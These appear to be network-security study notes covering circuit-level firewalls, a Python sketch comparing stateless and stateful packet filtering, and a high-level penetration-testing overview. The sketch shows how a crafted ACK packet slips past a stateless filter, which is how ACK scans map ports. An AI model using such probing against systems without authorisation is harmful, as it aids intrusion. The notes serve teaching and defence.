o How it works: Circuit-level firewalls operate at the transport layer
(TCP). They create a virtual connection between the internal and
external hosts and monitor the TCP handshake process to
establish that the communication is legitimate.
o SOCKS Protocol: This is a popular protocol used in circuit-level
firewalls. It relays TCP connections between the client and the server
without exposing the internal network directly. SOCKS itself adds no
encryption; any confidentiality comes from the application protocol
(e.g., TLS) carried over it.
o Key Feature: Unlike application-level firewalls, circuit-level
firewalls don't inspect the data inside the packets; they just
monitor the session state to ensure that a connection is
legitimate.
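The difference between stateless and stateful packet filtering, as an added Python example that is not part of the original notes. The network `10.0.0.0/8`, the rule set and the packets are constructed; the point is that a stateless filter has to approximate "replies to our own connections" with the ACK bit, which an attacker can simply set, while a stateful filter allows only packets belonging to a connection it saw start.

```python
import ipaddress
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Set, Tuple

INTERNAL = ipaddress.ip_network("10.0.0.0/8")      # hypothetical trusted network

@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: FrozenSet[str]        # TCP flags present, e.g. frozenset({"SYN", "ACK"})

@dataclass(frozen=True)
class Rule:
    action: str                  # "allow" or "deny"
    src: str                     # CIDR or "any"
    dst: str
    dport: Optional[int]         # None matches any port
    ack_only: bool = False       # stateless stand-in for "established": ACK bit set

def _net_match(cidr: str, addr: str) -> bool:
    return cidr == "any" or ipaddress.ip_address(addr) in ipaddress.ip_network(cidr)

def _rule_match(rule: Rule, pkt: Packet) -> bool:
    return (_net_match(rule.src, pkt.src) and _net_match(rule.dst, pkt.dst)
            and (rule.dport is None or rule.dport == pkt.dport)
            and (not rule.ack_only or "ACK" in pkt.flags))

# Constructed policy: expose one HTTPS server, let replies to internal
# connections back in, deny everything else. First match wins.
RULES: List[Rule] = [
    Rule("allow", "any", "10.0.0.10/32", 443),
    Rule("allow", "any", "10.0.0.0/8", None, ack_only=True),
    Rule("deny", "any", "any", None),
]

def stateless_decide(rules: List[Rule], pkt: Packet) -> str:
    for rule in rules:
        if _rule_match(rule, pkt):
            return rule.action
    return "deny"                # implicit default deny

class StatefulFirewall:
    """Same policy, but 'established' means a connection this firewall saw start."""

    def __init__(self, rules: List[Rule]):
        self.rules = [r for r in rules if not r.ack_only]   # state replaces the ACK heuristic
        self.table: Set[Tuple[str, int, str, int]] = set()   # (client, cport, server, sport)

    def decide(self, pkt: Packet) -> str:
        fwd = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        rev = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if fwd in self.table or rev in self.table:
            return "allow"                                   # belongs to a tracked connection
        if pkt.flags == frozenset({"SYN"}):                  # new connection attempt
            outbound = ipaddress.ip_address(pkt.src) in INTERNAL
            if outbound or stateless_decide(self.rules, pkt) == "allow":
                self.table.add(fwd)
                return "allow"
        return "deny"              # ACK/FIN/RST with no known connection: dropped

if __name__ == "__main__":
    probe = Packet("203.0.113.9", 40000, "10.0.0.10", 22, frozenset({"ACK"}))
    print("stateless:", stateless_decide(RULES, probe))      # allowed by the ACK rule
    print("stateful: ", StatefulFirewall(RULES).decide(probe))  # no connection, denied
```

The ACK probe to port 22 is exactly the traffic an "ACK scan" sends to map which ports a stateless filter lets through. A real stateful firewall also ages entries out, tracks sequence numbers and removes state on FIN/RST, which this sketch omits.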
Penetration Testing
Penetration Testing, also known as Pen Testing or Ethical Hacking, is a
simulated cyberattack on a computer system, network, or application to
identify and exploit vulnerabilities before malicious hackers can.
Purpose of Penetration Testing
Identify security weaknesses.
Test the effectiveness of existing security measures.
Assess compliance with security policies and regulations.
Prevent data breaches and unauthorized access.
Types of Penetration Testing
1. Black Box Testing
o Tester has no prior knowledge of the system.
o Simulates an external attack.
2. White Box Testing
o Tester has full access to system details (source code, credentials,
etc.).
o Comprehensive analysis of internal security.
3. Gray Box Testing
o Tester has partial knowledge of the system.
o Balances realism and depth.
Phases of Penetration Testing
1. Planning and Reconnaissance
o Define scope and gather intelligence (e.g., domain names, IPs).
2. Scanning
o Identify open ports, services, and vulnerabilities using tools like
Nmap or Nessus.
3. Gaining Access
o Exploit vulnerabilities to gain control over systems.
4. Maintaining Access
o Simulate advanced persistent threats (APTs) to test long-term
presence.
5. Analysis and Reporting
o Document findings, risks, exploited vulnerabilities, and suggest
fixes.
Common Tools Used
Nmap, Metasploit, Burp Suite, Wireshark, Nessus, Nikto, etc.